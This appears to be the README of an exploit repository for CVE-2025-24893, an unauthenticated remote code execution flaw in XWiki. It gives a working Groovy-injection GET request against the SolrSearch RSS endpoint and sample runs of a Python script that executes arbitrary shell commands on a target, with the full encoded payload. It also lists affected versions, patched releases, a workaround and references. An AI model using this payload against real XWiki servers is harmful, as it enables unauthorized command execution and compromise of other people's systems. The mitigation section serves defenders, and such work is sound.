来源

关联漏洞

介绍

# Exploit for CVE-2025-24893

**CVE-2025-24893** is a **critical unauthenticated remote code execution (RCE)** vulnerability affecting the **XWiki Platform**.  
This flaw lets any guest user inject and execute arbitrary **Groovy code**—without authentication—via a specially crafted RSS request to the **SolrSearch** endpoint.

This directly impacts the **confidentiality, integrity, and availability** of the affected system.

### Summary

- **Affected Versions:**
  - XWiki ≥ 5.3-milestone-2 up to < 15.10.11
  - XWiki ≥ 16.0.0-rc-1 up to < 16.4.1
- **CVSS v3.1 Score:** 9.8 (**Critical**)  
  Vector: `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Exploitability:** Very easy — a single HTTP GET request is enough.

---

> ⚠️ **Disclaimer:**  
>
> This code is strictly intended for educational and research purposes only. Unauthorized use on systems without explicit permission may constitute a violation of the law. 
> The author is not responsible for any misuse or malicious activity involving this tool.


### Proof-of-Concept (POC)

```http
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
```

---

## Usage Manual for the Exploit Script

This section explains how to set up and run the Python exploit script to take advantage of **CVE-2025-24893**.

---

```c
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
```


```c
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  
```

## Mitigation

### Update to fixed versions:
To patch the vulnerability, update XWiki to one of the following versions:

- **XWiki 15.10.11**
- **XWiki 16.4.1**
- **XWiki 16.5.0 RC1**

---

### Temporary Workaround:
If an update is not immediately possible, you can apply a temporary fix:

1. Edit the file **`SolrSearchMacros.xml`** (located at `Main.SolrSearchMacros`) around **line 955**.
2. Replace the output logic to use the **`rawResponse`** macro with the content type set to `application/xml`.  
   Use the implementation found in `macros.vm` at **line 2824** as a reference.

**References:**
- [NVD - CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
- [Ionix Blog](https://www.ionix.io/blog/xwiki-remote-code-execution-vulnerability-cve-2025-24893/)
- [Miggo.io](https://www.miggo.io/vulnerability-database/cve/CVE-2025-24893)

文件快照

 [4.0K]  /data/pocs/94cd7303c1579f8a5422c17e212474aac6b63aea
├── [1.6K]  CVE-2025-24893.py
└── [2.8K]  README.md

0 directories, 2 files

备注